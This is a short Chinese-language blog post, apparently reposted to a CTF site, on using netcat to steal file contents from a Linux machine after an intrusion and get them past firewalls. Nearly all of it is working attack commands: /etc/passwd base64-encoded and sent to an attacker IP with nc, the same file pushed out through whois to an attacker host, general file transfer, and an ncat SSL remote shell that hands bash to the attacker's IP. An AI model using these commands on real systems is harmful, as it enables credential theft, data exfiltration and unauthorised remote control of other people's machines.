nc加密盗取文件内容的小技巧

这里简单介绍一下,情况是这样

我们入侵Linux之后,植入nc后,想盗取部分内容无法直接传输,因为会遇到防火墙的拦截,这里就需要进行加密传输。

黑客端:

nc -l -p 8889 > kali.txt

受害端Linux系统:

cat /etc/passwd | base64 | nc -nv [黑客ip] 3333 -q 1

nc加密盗取文件内容的小技巧

然后黑客端的nc目录下会生成一个kali.txt,里面存放了base64加密之后的passwd内容

传输文件:

控制端:

    nc -l -p 8889 > poc.py


被控端:

    nc -nv 10.0.79.241 8889 < ./poc.py -q 1

传输的文件接收的时候命名最好是一样的

文件基本不会被防火墙拦截

在两台都是Linux的情况下,目标机器无法上传nc,可以利用whois的命令来完成

黑客机器:

nc -l -v -p 8889 |sed "s/ //g" | base64 -d

目标机器:

 whois -h [黑客IP] -p 8889 `cat /etc/passwd | base64 `

两台都是linux,并且要加密通信

nc的加密版ncat

目标:

ncat -c bash --allow [黑客ip] -vnl 3333 --ssl 

只允许黑客的ip去控制它

黑客:

nc -nv [目标ip] 3333 --ssl

nc加密盗取文件内容的小技巧

这样我们的一个命令传输过程就是完全加密了的。


原文始发于微信公众号(白安全组):nc加密盗取文件内容的小技巧

版权声明:admin 发表于 2022年11月14日 下午6:42。
转载请注明:nc加密盗取文件内容的小技巧 | CTF导航

相关文章

暂无评论

暂无评论...